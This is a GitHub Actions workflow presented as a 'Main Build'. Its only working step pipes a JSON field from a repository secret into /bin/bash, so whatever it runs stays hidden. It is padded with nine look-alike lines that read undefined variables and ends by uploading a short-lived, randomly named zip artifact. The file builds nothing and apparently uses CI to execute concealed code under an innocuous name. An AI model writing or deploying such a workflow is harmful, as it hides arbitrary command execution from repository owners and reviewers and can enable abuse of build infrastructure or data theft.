name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '4 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Apply
        env:
          g969: ${{ secrets.g969 }}
        run: |
          printf '%s' "$g969" | jq -r .lhlu6 | /bin/bash
          echo $ons8 | jq -r .fbza93 | /bin/bash
          echo $yimf5524 | jq -r .sdbym79733 | /bin/bash
          printf '%s' "$fzsw19107" | jq -r .th89809 | /bin/bash
          printf '%s' "$whtsf51" | jq -r .kfkl4 | /bin/bash
          echo $abyq0 | jq -r .nwbr8811 | /bin/bash
          echo $qw36604 | jq -r .yzaa91631 | /bin/bash
          echo $itx6154 | jq -r .vh3096 | /bin/bash
          echo $b51 | jq -r .nig595 | /bin/bash
          printf '%s' "$y97" | jq -r .qqi1 | /bin/bash

      - name: Upload output
        uses: actions/upload-artifact@v4
        with:
          name: nBtKJN3U
          path: "*.zip"
          retention-days: 1
